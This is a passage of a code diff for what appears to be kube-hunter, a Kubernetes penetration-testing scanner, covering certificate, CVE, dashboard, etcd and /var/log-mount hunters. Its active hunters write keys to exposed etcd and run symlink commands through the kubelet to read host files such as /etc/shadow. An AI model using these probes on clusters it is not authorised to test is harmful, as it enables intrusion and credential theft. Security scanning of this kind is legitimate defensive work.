||||
logger.debug("Passive hunter's closing RAW socket")
|
||||
return True
|
||||
except PermissionError:
|
||||
logger.debug("CAP_NET_RAW not enabled")
|
||||
|
||||
def execute(self):
|
||||
if self.check_net_raw():
|
||||
self.publish_event(CapNetRawEnabled())
|
||||
55
kube_hunter/modules/hunting/certificates.py
Normal file
55
kube_hunter/modules/hunting/certificates.py
Normal file
@@ -0,0 +1,55 @@
|
||||
import ssl
|
||||
import logging
|
||||
import base64
|
||||
import re
|
||||
|
||||
from kube_hunter.core.types import Hunter, KubernetesCluster, GeneralSensitiveInformationTechnique
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import Vulnerability, Event, Service
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
email_pattern = re.compile(rb"([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)")
|
||||
|
||||
|
||||
class CertificateEmail(Vulnerability, Event):
|
||||
"""The Kubernetes API Server advertises a public certificate for TLS.
|
||||
This certificate includes an email address, that may provide additional information for an attacker on your
|
||||
organization, or be abused for further email based attacks."""
|
||||
|
||||
def __init__(self, email):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
"Certificate Includes Email Address",
|
||||
category=GeneralSensitiveInformationTechnique,
|
||||
vid="KHV021",
|
||||
)
|
||||
self.email = email
|
||||
self.evidence = f"email: {self.email}"
|
||||
|
||||
|
||||
@handler.subscribe(Service)
|
||||
class CertificateDiscovery(Hunter):
|
||||
"""Certificate Email Hunting
|
||||
Checks for email addresses in kubernetes ssl certificates
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
|
||||
def execute(self):
|
||||
try:
|
||||
logger.debug("Passive hunter is attempting to get server certificate")
|
||||
addr = (str(self.event.host), self.event.port)
|
||||
cert = ssl.get_server_certificate(addr)
|
||||
except ssl.SSLError:
|
||||
# If the server doesn't offer SSL on this port we won't get a certificate
|
||||
return
|
||||
self.examine_certificate(cert)
|
||||
|
||||
def examine_certificate(self, cert):
|
||||
c = cert.strip(ssl.PEM_HEADER).strip("\n").strip(ssl.PEM_FOOTER).strip("\n")
|
||||
certdata = base64.b64decode(c)
|
||||
emails = re.findall(email_pattern, certdata)
|
||||
for email in emails:
|
||||
self.publish_event(CertificateEmail(email=email))
|
||||
@@ -1,117 +1,183 @@
|
||||
import logging
|
||||
import json
|
||||
import requests
|
||||
|
||||
from __main__ import config
|
||||
|
||||
from ...core.events import handler
|
||||
from ...core.events.types import Vulnerability, Event, K8sVersionDisclosure
|
||||
from ...core.types import Hunter, ActiveHunter, KubernetesCluster, RemoteCodeExec, AccessRisk, InformationDisclosure, \
|
||||
PrivilegeEscalation, DenialOfService, KubectlClient
|
||||
from ..discovery.kubectl import KubectlClientEvent
|
||||
|
||||
from packaging import version
|
||||
|
||||
""" Cluster CVES """
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
|
||||
from kube_hunter.core.events.types import K8sVersionDisclosure, Vulnerability, Event
|
||||
from kube_hunter.core.types import (
|
||||
Hunter,
|
||||
KubectlClient,
|
||||
KubernetesCluster,
|
||||
CVERemoteCodeExecutionCategory,
|
||||
CVEPrivilegeEscalationCategory,
|
||||
CVEDenialOfServiceTechnique,
|
||||
)
|
||||
from kube_hunter.modules.discovery.kubectl import KubectlClientEvent
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
config = get_config()
|
||||
|
||||
|
||||
class ServerApiVersionEndPointAccessPE(Vulnerability, Event):
|
||||
"""Node is vulnerable to critical CVE-2018-1002105"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(self, KubernetesCluster, name="Critical Privilege Escalation CVE", category=PrivilegeEscalation, vid="KHV022")
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Critical Privilege Escalation CVE",
|
||||
category=CVEPrivilegeEscalationCategory,
|
||||
vid="KHV022",
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class ServerApiVersionEndPointAccessDos(Vulnerability, Event):
|
||||
"""Node not patched for CVE-2019-1002100. Depending on your RBAC settings, a crafted json-patch could cause a Denial of Service."""
|
||||
"""Node not patched for CVE-2019-1002100. Depending on your RBAC settings,
|
||||
a crafted json-patch could cause a Denial of Service."""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(self, KubernetesCluster, name="Denial of Service to Kubernetes API Server", category=DenialOfService, vid="KHV023")
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Denial of Service to Kubernetes API Server",
|
||||
category=CVEDenialOfServiceTechnique,
|
||||
vid="KHV023",
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class PingFloodHttp2Implementation(Vulnerability, Event):
|
||||
"""Node not patched for CVE-2019-9512. an attacker could cause a Denial of Service by sending specially crafted HTTP requests."""
|
||||
"""Node not patched for CVE-2019-9512. an attacker could cause a
|
||||
Denial of Service by sending specially crafted HTTP requests."""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(self, KubernetesCluster, name="Possible Ping Flood Attack", category=DenialOfService, vid="KHV024")
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Possible Ping Flood Attack",
|
||||
category=CVEDenialOfServiceTechnique,
|
||||
vid="KHV024",
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class ResetFloodHttp2Implementation(Vulnerability, Event):
|
||||
"""Node not patched for CVE-2019-9514. an attacker could cause a Denial of Service by sending specially crafted HTTP requests."""
|
||||
"""Node not patched for CVE-2019-9514. an attacker could cause a
|
||||
Denial of Service by sending specially crafted HTTP requests."""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(self, KubernetesCluster, name="Possible Reset Flood Attack", category=DenialOfService, vid="KHV025")
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Possible Reset Flood Attack",
|
||||
category=CVEDenialOfServiceTechnique,
|
||||
vid="KHV025",
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class ServerApiClusterScopedResourcesAccess(Vulnerability, Event):
|
||||
"""Api Server not patched for CVE-2019-11247. API server allows access to custom resources via wrong scope"""
|
||||
"""Api Server not patched for CVE-2019-11247.
|
||||
API server allows access to custom resources via wrong scope"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(self, KubernetesCluster, name="Arbitrary Access To Cluster Scoped Resources", category=PrivilegeEscalation, vid="KHV026")
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Arbitrary Access To Cluster Scoped Resources",
|
||||
category=CVEPrivilegeEscalationCategory,
|
||||
vid="KHV026",
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
""" Kubectl CVES """
|
||||
|
||||
class IncompleteFixToKubectlCpVulnerability(Vulnerability, Event):
|
||||
"""The kubectl client is vulnerable to CVE-2019-11246, an attacker could potentially execute arbitrary code on the client's machine"""
|
||||
"""The kubectl client is vulnerable to CVE-2019-11246,
|
||||
an attacker could potentially execute arbitrary code on the client's machine"""
|
||||
|
||||
def __init__(self, binary_version):
|
||||
Vulnerability.__init__(self, KubectlClient, "Kubectl Vulnerable To CVE-2019-11246", category=RemoteCodeExec, vid="KHV027")
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubectlClient,
|
||||
"Kubectl Vulnerable To CVE-2019-11246",
|
||||
category=CVERemoteCodeExecutionCategory,
|
||||
vid="KHV027",
|
||||
)
|
||||
self.binary_version = binary_version
|
||||
self.evidence = "kubectl version: {}".format(self.binary_version)
|
||||
self.evidence = f"kubectl version: {self.binary_version}"
|
||||
|
||||
|
||||
class KubectlCpVulnerability(Vulnerability, Event):
|
||||
"""The kubectl client is vulnerable to CVE-2019-1002101, an attacker could potentially execute arbitrary code on the client's machine"""
|
||||
"""The kubectl client is vulnerable to CVE-2019-1002101,
|
||||
an attacker could potentially execute arbitrary code on the client's machine"""
|
||||
|
||||
def __init__(self, binary_version):
|
||||
Vulnerability.__init__(self, KubectlClient, "Kubectl Vulnerable To CVE-2019-1002101", category=RemoteCodeExec, vid="KHV028")
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubectlClient,
|
||||
"Kubectl Vulnerable To CVE-2019-1002101",
|
||||
category=CVERemoteCodeExecutionCategory,
|
||||
vid="KHV028",
|
||||
)
|
||||
self.binary_version = binary_version
|
||||
self.evidence = "kubectl version: {}".format(self.binary_version)
|
||||
self.evidence = f"kubectl version: {self.binary_version}"
|
||||
|
||||
|
||||
class CveUtils:
|
||||
@staticmethod
|
||||
def get_base_release(full_ver):
|
||||
# if LegacyVersion, converting manually to a base version
|
||||
if type(full_ver) == version.LegacyVersion:
|
||||
return version.parse('.'.join(full_ver._version.split('.')[:2]))
|
||||
return version.parse('.'.join(map(str, full_ver._version.release[:2])))
|
||||
if isinstance(full_ver, version.LegacyVersion):
|
||||
return version.parse(".".join(full_ver._version.split(".")[:2]))
|
||||
return version.parse(".".join(map(str, full_ver._version.release[:2])))
|
||||
|
||||
@staticmethod
|
||||
def to_legacy(full_ver):
|
||||
# converting version to version.LegacyVersion
|
||||
return version.LegacyVersion('.'.join(map(str, full_ver._version.release)))
|
||||
return version.LegacyVersion(".".join(map(str, full_ver._version.release)))
|
||||
|
||||
@staticmethod
|
||||
def to_raw_version(v):
|
||||
if type(v) != version.LegacyVersion:
|
||||
return '.'.join(map(str, v._version.release))
|
||||
if not isinstance(v, version.LegacyVersion):
|
||||
return ".".join(map(str, v._version.release))
|
||||
return v._version
|
||||
|
||||
|
||||
@staticmethod
|
||||
def version_compare(v1, v2):
|
||||
"""Function compares two versions, handling differences with conversion to LegacyVersion"""
|
||||
# getting raw version, while striping 'v' char at the start. if exists.
|
||||
# getting raw version, while striping 'v' char at the start. if exists.
|
||||
# removing this char lets us safely compare the two version.
|
||||
v1_raw, v2_raw = CveUtils.to_raw_version(v1).strip('v'), CveUtils.to_raw_version(v2).strip('v')
|
||||
v1_raw = CveUtils.to_raw_version(v1).strip("v")
|
||||
v2_raw = CveUtils.to_raw_version(v2).strip("v")
|
||||
new_v1 = version.LegacyVersion(v1_raw)
|
||||
new_v2 = version.LegacyVersion(v2_raw)
|
||||
|
||||
|
||||
return CveUtils.basic_compare(new_v1, new_v2)
|
||||
|
||||
@staticmethod
|
||||
def basic_compare(v1, v2):
|
||||
return (v1>v2)-(v1<v2)
|
||||
return (v1 > v2) - (v1 < v2)
|
||||
|
||||
@staticmethod
|
||||
def is_downstream_version(version):
|
||||
return any(c in version for c in '+-~')
|
||||
return any(c in version for c in "+-~")
|
||||
|
||||
@staticmethod
|
||||
def is_vulnerable(fix_versions, check_version, ignore_downstream=False):
|
||||
"""Function determines if a version is vulnerable, by comparing to given fix versions by base release"""
|
||||
"""Function determines if a version is vulnerable,
|
||||
by comparing to given fix versions by base release"""
|
||||
if ignore_downstream and CveUtils.is_downstream_version(check_version):
|
||||
return False
|
||||
|
||||
vulnerable = False
|
||||
check_v = version.parse(check_version)
|
||||
base_check_v = CveUtils.get_base_release(check_v)
|
||||
|
||||
|
||||
# default to classic compare, unless the check_version is legacy.
|
||||
version_compare_func = CveUtils.basic_compare
|
||||
if type(check_v) == version.LegacyVersion:
|
||||
if isinstance(check_v, version.LegacyVersion):
|
||||
version_compare_func = CveUtils.version_compare
|
||||
|
||||
if check_version not in fix_versions:
|
||||
@@ -120,58 +186,63 @@ class CveUtils:
|
||||
fix_v = version.parse(fix_v)
|
||||
base_fix_v = CveUtils.get_base_release(fix_v)
|
||||
|
||||
# if the check version and the current fix has the same base release
|
||||
# if the check version and the current fix has the same base release
|
||||
if base_check_v == base_fix_v:
|
||||
# when check_version is legacy, we use a custom compare func, to handle differences between versions.
|
||||
# when check_version is legacy, we use a custom compare func, to handle differences between versions
|
||||
if version_compare_func(check_v, fix_v) == -1:
|
||||
# determine vulnerable if smaller and with same base version
|
||||
vulnerable = True
|
||||
break
|
||||
|
||||
# if we did't find a fix in the fix releases, checking if the version is smaller that the first fix
|
||||
# if we did't find a fix in the fix releases, checking if the version is smaller that the first fix
|
||||
if not vulnerable and version_compare_func(check_v, version.parse(fix_versions[0])) == -1:
|
||||
vulnerable = True
|
||||
|
||||
return vulnerable
|
||||
|
||||
|
||||
@handler.subscribe_once(K8sVersionDisclosure)
|
||||
@handler.subscribe_once(K8sVersionDisclosure, is_register=config.enable_cve_hunting)
|
||||
class K8sClusterCveHunter(Hunter):
|
||||
"""K8s CVE Hunter
|
||||
Checks if Node is running a Kubernetes version vulnerable to specific important CVEs
|
||||
Checks if Node is running a Kubernetes version vulnerable to
|
||||
specific important CVEs
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
|
||||
def execute(self):
|
||||
logging.debug('Api Cve Hunter determining vulnerable version: {}'.format(self.event.version))
|
||||
config = get_config()
|
||||
logger.debug(f"Checking known CVEs for k8s API version: {self.event.version}")
|
||||
cve_mapping = {
|
||||
ServerApiVersionEndPointAccessPE: ["1.10.11", "1.11.5", "1.12.3"],
|
||||
ServerApiVersionEndPointAccessDos: ["1.11.8", "1.12.6", "1.13.4"],
|
||||
ResetFloodHttp2Implementation: ["1.13.10", "1.14.6", "1.15.3"],
|
||||
PingFloodHttp2Implementation: ["1.13.10", "1.14.6", "1.15.3"],
|
||||
ServerApiClusterScopedResourcesAccess: ["1.13.9", "1.14.5", "1.15.2"]
|
||||
}
|
||||
ServerApiClusterScopedResourcesAccess: ["1.13.9", "1.14.5", "1.15.2"],
|
||||
}
|
||||
for vulnerability, fix_versions in cve_mapping.items():
|
||||
if CveUtils.is_vulnerable(fix_versions, self.event.version, not config.include_patched_versions):
|
||||
self.publish_event(vulnerability(self.event.version))
|
||||
|
||||
|
||||
# Removed due to incomplete implementation for multiple vendors revisions of kubernetes
|
||||
@handler.subscribe(KubectlClientEvent)
|
||||
class KubectlCVEHunter(Hunter):
|
||||
"""Kubectl CVE Hunter
|
||||
Checks if the kubectl client is vulnerable to specific important CVEs
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
|
||||
def execute(self):
|
||||
config = get_config()
|
||||
cve_mapping = {
|
||||
KubectlCpVulnerability: ['1.11.9', '1.12.7', '1.13.5' '1.14.0'],
|
||||
IncompleteFixToKubectlCpVulnerability: ['1.12.9', '1.13.6', '1.14.2']
|
||||
KubectlCpVulnerability: ["1.11.9", "1.12.7", "1.13.5", "1.14.0"],
|
||||
IncompleteFixToKubectlCpVulnerability: ["1.12.9", "1.13.6", "1.14.2"],
|
||||
}
|
||||
logging.debug('Kubectl Cve Hunter determining vulnerable version: {}'.format(self.event.version))
|
||||
logger.debug(f"Checking known CVEs for kubectl version: {self.event.version}")
|
||||
for vulnerability, fix_versions in cve_mapping.items():
|
||||
if CveUtils.is_vulnerable(fix_versions, self.event.version, not config.include_patched_versions):
|
||||
self.publish_event(vulnerability(binary_version=self.event.version))
|
||||
45
kube_hunter/modules/hunting/dashboard.py
Normal file
45
kube_hunter/modules/hunting/dashboard.py
Normal file
@@ -0,0 +1,45 @@
|
||||
import logging
|
||||
import json
|
||||
import requests
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.core.types import Hunter, AccessK8sDashboardTechnique, KubernetesCluster
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import Vulnerability, Event
|
||||
from kube_hunter.modules.discovery.dashboard import KubeDashboardEvent
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class DashboardExposed(Vulnerability, Event):
|
||||
"""All operations on the cluster are exposed"""
|
||||
|
||||
def __init__(self, nodes):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
"Dashboard Exposed",
|
||||
category=AccessK8sDashboardTechnique,
|
||||
vid="KHV029",
|
||||
)
|
||||
self.evidence = "nodes: {}".format(" ".join(nodes)) if nodes else None
|
||||
|
||||
|
||||
@handler.subscribe(KubeDashboardEvent)
|
||||
class KubeDashboard(Hunter):
|
||||
"""Dashboard Hunting
|
||||
Hunts open Dashboards, gets the type of nodes in the cluster
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
|
||||
def get_nodes(self):
|
||||
config = get_config()
|
||||
logger.debug("Passive hunter is attempting to get nodes types of the cluster")
|
||||
r = requests.get(f"http://{self.event.host}:{self.event.port}/api/v1/node", timeout=config.network_timeout)
|
||||
if r.status_code == 200 and "nodes" in r.text:
|
||||
return [node["objectMeta"]["name"] for node in json.loads(r.text)["nodes"]]
|
||||
|
||||
def execute(self):
|
||||
self.publish_event(DashboardExposed(nodes=self.get_nodes()))
|
||||
176
kube_hunter/modules/hunting/etcd.py
Normal file
176
kube_hunter/modules/hunting/etcd.py
Normal file
@@ -0,0 +1,176 @@
|
||||
import logging
|
||||
import requests
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import Vulnerability, Event, OpenPortEvent
|
||||
from kube_hunter.core.types import (
|
||||
ActiveHunter,
|
||||
Hunter,
|
||||
KubernetesCluster,
|
||||
GeneralSensitiveInformationTechnique,
|
||||
GeneralPersistenceTechnique,
|
||||
ListK8sSecretsTechnique,
|
||||
ExposedSensitiveInterfacesTechnique,
|
||||
)
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
ETCD_PORT = 2379
|
||||
|
||||
|
||||
""" Vulnerabilities """
|
||||
|
||||
|
||||
class EtcdRemoteWriteAccessEvent(Vulnerability, Event):
|
||||
"""Remote write access might grant an attacker full control over the kubernetes cluster"""
|
||||
|
||||
def __init__(self, write_res):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Etcd Remote Write Access Event",
|
||||
category=GeneralPersistenceTechnique,
|
||||
vid="KHV031",
|
||||
)
|
||||
self.evidence = write_res
|
||||
|
||||
|
||||
class EtcdRemoteReadAccessEvent(Vulnerability, Event):
|
||||
"""Remote read access might expose to an attacker cluster's possible exploits, secrets and more."""
|
||||
|
||||
def __init__(self, keys):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Etcd Remote Read Access Event",
|
||||
category=ListK8sSecretsTechnique,
|
||||
vid="KHV032",
|
||||
)
|
||||
self.evidence = keys
|
||||
|
||||
|
||||
class EtcdRemoteVersionDisclosureEvent(Vulnerability, Event):
|
||||
"""Remote version disclosure might give an attacker a valuable data to attack a cluster"""
|
||||
|
||||
def __init__(self, version):
|
||||
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Etcd Remote version disclosure",
|
||||
category=GeneralSensitiveInformationTechnique,
|
||||
vid="KHV033",
|
||||
)
|
||||
self.evidence = version
|
||||
|
||||
|
||||
class EtcdAccessEnabledWithoutAuthEvent(Vulnerability, Event):
|
||||
"""Etcd is accessible using HTTP (without authorization and authentication),
|
||||
it would allow a potential attacker to
|
||||
gain access to the etcd"""
|
||||
|
||||
def __init__(self, version):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Etcd is accessible using insecure connection (HTTP)",
|
||||
category=ExposedSensitiveInterfacesTechnique,
|
||||
vid="KHV034",
|
||||
)
|
||||
self.evidence = version
|
||||
|
||||
|
||||
# Active Hunter
|
||||
@handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == ETCD_PORT)
|
||||
class EtcdRemoteAccessActive(ActiveHunter):
|
||||
"""Etcd Remote Access
|
||||
Checks for remote write access to etcd, will attempt to add a new key to the etcd DB"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.write_evidence = ""
|
||||
self.event.protocol = "https"
|
||||
|
||||
def db_keys_write_access(self):
|
||||
config = get_config()
|
||||
logger.debug(f"Trying to write keys remotely on host {self.event.host}")
|
||||
data = {"value": "remotely written data"}
|
||||
try:
|
||||
r = requests.post(
|
||||
f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys/message",
|
||||
data=data,
|
||||
timeout=config.network_timeout,
|
||||
)
|
||||
self.write_evidence = r.content if r.status_code == 200 and r.content else False
|
||||
return self.write_evidence
|
||||
except requests.exceptions.ConnectionError:
|
||||
return False
|
||||
|
||||
def execute(self):
|
||||
if self.db_keys_write_access():
|
||||
self.publish_event(EtcdRemoteWriteAccessEvent(self.write_evidence))
|
||||
|
||||
|
||||
# Passive Hunter
|
||||
@handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == ETCD_PORT)
|
||||
class EtcdRemoteAccess(Hunter):
|
||||
"""Etcd Remote Access
|
||||
Checks for remote availability of etcd, its version, and read access to the DB
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.version_evidence = ""
|
||||
self.keys_evidence = ""
|
||||
self.event.protocol = "https"
|
||||
|
||||
def db_keys_disclosure(self):
|
||||
config = get_config()
|
||||
logger.debug(f"{self.event.host} Passive hunter is attempting to read etcd keys remotely")
|
||||
try:
|
||||
r = requests.get(
|
||||
f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys",
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
)
|
||||
self.keys_evidence = r.content if r.status_code == 200 and r.content != "" else False
|
||||
return self.keys_evidence
|
||||
except requests.exceptions.ConnectionError:
|
||||
return False
|
||||
|
||||
def version_disclosure(self):
|
||||
config = get_config()
|
||||
logger.debug(f"Trying to check etcd version remotely at {self.event.host}")
|
||||
try:
|
||||
r = requests.get(
|
||||
f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/version",
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
)
|
||||
self.version_evidence = r.content if r.status_code == 200 and r.content else False
|
||||
return self.version_evidence
|
||||
except requests.exceptions.ConnectionError:
|
||||
return False
|
||||
|
||||
def insecure_access(self):
|
||||
config = get_config()
|
||||
logger.debug(f"Trying to access etcd insecurely at {self.event.host}")
|
||||
try:
|
||||
r = requests.get(
|
||||
f"http://{self.event.host}:{ETCD_PORT}/version",
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
)
|
||||
return r.content if r.status_code == 200 and r.content else False
|
||||
except requests.exceptions.ConnectionError:
|
||||
return False
|
||||
|
||||
def execute(self):
|
||||
if self.insecure_access(): # make a decision between http and https protocol
|
||||
self.event.protocol = "http"
|
||||
if self.version_disclosure():
|
||||
self.publish_event(EtcdRemoteVersionDisclosureEvent(self.version_evidence))
|
||||
if self.event.protocol == "http":
|
||||
self.publish_event(EtcdAccessEnabledWithoutAuthEvent(self.version_evidence))
|
||||
if self.db_keys_disclosure():
|
||||
self.publish_event(EtcdRemoteReadAccessEvent(self.keys_evidence))
|
||||
1151
kube_hunter/modules/hunting/kubelet.py
Normal file
1151
kube_hunter/modules/hunting/kubelet.py
Normal file
File diff suppressed because it is too large
Load Diff
@@ -1,33 +1,57 @@
|
||||
import logging
|
||||
import json
|
||||
import re
|
||||
import uuid
|
||||
|
||||
from ...core.events import handler
|
||||
from ...core.events.types import Event, Vulnerability
|
||||
from ...core.types import ActiveHunter, Hunter, KubernetesCluster, PrivilegeEscalation
|
||||
from .kubelet import ExposedPodsHandler, ExposedRunHandler, KubeletHandlers
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import Event, Vulnerability
|
||||
from kube_hunter.core.types import ActiveHunter, Hunter, KubernetesCluster, HostPathMountPrivilegeEscalationTechnique
|
||||
from kube_hunter.modules.hunting.kubelet import (
|
||||
ExposedPodsHandler,
|
||||
ExposedRunHandler,
|
||||
KubeletHandlers,
|
||||
)
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
""" Vulnerabilities """
|
||||
class WriteMountToVarLog(Vulnerability, Event):
|
||||
"""A pod can create symlinks in the /var/log directory on the host, which can lead to a root directory traveral"""
|
||||
|
||||
def __init__(self, pods):
|
||||
Vulnerability.__init__(self, KubernetesCluster, "Pod With Mount To /var/log", category=PrivilegeEscalation, vid="KHV047")
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
"Pod With Mount To /var/log",
|
||||
category=HostPathMountPrivilegeEscalationTechnique,
|
||||
vid="KHV047",
|
||||
)
|
||||
self.pods = pods
|
||||
self.evidence = "pods: {}".format(', '.join((pod["metadata"]["name"] for pod in self.pods)))
|
||||
self.evidence = "pods: {}".format(", ".join(pod["metadata"]["name"] for pod in self.pods))
|
||||
|
||||
|
||||
class DirectoryTraversalWithKubelet(Vulnerability, Event):
|
||||
"""An attacker can run commands on pods with mount to /var/log, and traverse read all files on the host filesystem"""
|
||||
"""An attacker can run commands on pods with mount to /var/log,
|
||||
and traverse read all files on the host filesystem"""
|
||||
|
||||
def __init__(self, output):
|
||||
Vulnerability.__init__(self, KubernetesCluster, "Root Traversal Read On The Kubelet", category=PrivilegeEscalation)
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
"Root Traversal Read On The Kubelet",
|
||||
category=HostPathMountPrivilegeEscalationTechnique,
|
||||
)
|
||||
self.output = output
|
||||
self.evidence = "output: {}".format(self.output)
|
||||
self.evidence = f"output: {self.output}"
|
||||
|
||||
|
||||
@handler.subscribe(ExposedPodsHandler)
|
||||
class VarLogMountHunter(Hunter):
|
||||
"""Mount Hunter - /var/log
|
||||
Hunt pods that have write access to host's /var/log. in such case,
|
||||
Hunt pods that have write access to host's /var/log. in such case,
|
||||
the pod can traverse read files on the host machine
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
|
||||
@@ -38,7 +62,7 @@ class VarLogMountHunter(Hunter):
|
||||
if "Directory" in volume["hostPath"]["type"]:
|
||||
if volume["hostPath"]["path"].startswith(path):
|
||||
return volume
|
||||
|
||||
|
||||
def execute(self):
|
||||
pe_pods = []
|
||||
for pod in self.event.pods:
|
||||
@@ -47,64 +71,71 @@ class VarLogMountHunter(Hunter):
|
||||
if pe_pods:
|
||||
self.publish_event(WriteMountToVarLog(pods=pe_pods))
|
||||
|
||||
@handler.subscribe(ExposedRunHandler)
|
||||
|
||||
@handler.subscribe_many([ExposedRunHandler, WriteMountToVarLog])
|
||||
class ProveVarLogMount(ActiveHunter):
|
||||
"""Prove /var/log Mount Hunter
|
||||
Tries to read /etc/shadow on the host by running commands inside a pod with host mount to /var/log
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.base_path = "https://{host}:{port}/".format(host=self.event.host, port=self.event.port)
|
||||
self.write_mount_event = self.event.get_by_class(WriteMountToVarLog)
|
||||
self.event = self.write_mount_event
|
||||
|
||||
self.base_path = f"https://{self.write_mount_event.host}:{self.write_mount_event.port}"
|
||||
|
||||
def run(self, command, container):
|
||||
run_url = KubeletHandlers.RUN.value.format(
|
||||
podNamespace=container["namespace"],
|
||||
podID=container["pod"],
|
||||
containerName=container["name"],
|
||||
cmd=command
|
||||
cmd=command,
|
||||
)
|
||||
return self.event.session.post(self.base_path + run_url, verify=False).text
|
||||
|
||||
# TODO: replace with multiple subscription to WriteMountToVarLog as well
|
||||
def get_varlog_mounters(self):
|
||||
logging.debug("accessing /pods manually on ProveVarLogMount")
|
||||
pods = json.loads(self.event.session.get(self.base_path + KubeletHandlers.PODS.value, verify=False).text)["items"]
|
||||
for pod in pods:
|
||||
volume = VarLogMountHunter(ExposedPodsHandler(pods=pods)).has_write_mount_to(pod, "/var/log")
|
||||
if volume:
|
||||
yield pod, volume
|
||||
return self.event.session.post(f"{self.base_path}/{run_url}", verify=False).text
|
||||
|
||||
def mount_path_from_mountname(self, pod, mount_name):
|
||||
"""returns container name, and container mount path correlated to mount_name"""
|
||||
for container in pod["spec"]["containers"]:
|
||||
for volume_mount in container["volumeMounts"]:
|
||||
if volume_mount["name"] == mount_name:
|
||||
logging.debug("yielding {}".format(container))
|
||||
logger.debug(f"yielding {container}")
|
||||
yield container, volume_mount["mountPath"]
|
||||
|
||||
def traverse_read(self, host_file, container, mount_path, host_path):
|
||||
"""Returns content of file on the host, and cleans trails"""
|
||||
config = get_config()
|
||||
symlink_name = str(uuid.uuid4())
|
||||
# creating symlink to file
|
||||
self.run("ln -s {} {}/{}".format(host_file, mount_path, symlink_name), container=container)
|
||||
self.run(f"ln -s {host_file} {mount_path}/{symlink_name}", container)
|
||||
# following symlink with kubelet
|
||||
path_in_logs_endpoint = KubeletHandlers.LOGS.value.format(path=host_path.strip('/var/log')+symlink_name)
|
||||
content = self.event.session.get("{}{}".format(self.base_path, path_in_logs_endpoint), verify=False).text
|
||||
path_in_logs_endpoint = KubeletHandlers.LOGS.value.format(
|
||||
path=re.sub(r"^/var/log", "", host_path) + symlink_name
|
||||
)
|
||||
content = self.event.session.get(
|
||||
f"{self.base_path}/{path_in_logs_endpoint}",
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
).text
|
||||
# removing symlink
|
||||
self.run("rm {}/{}".format(mount_path, symlink_name), container=container)
|
||||
self.run(f"rm {mount_path}/{symlink_name}", container=container)
|
||||
return content
|
||||
|
||||
def execute(self):
|
||||
for pod, volume in self.get_varlog_mounters():
|
||||
for pod, volume in self.write_mount_event.pe_pods():
|
||||
for container, mount_path in self.mount_path_from_mountname(pod, volume["name"]):
|
||||
logging.debug("correleated container to mount_name")
|
||||
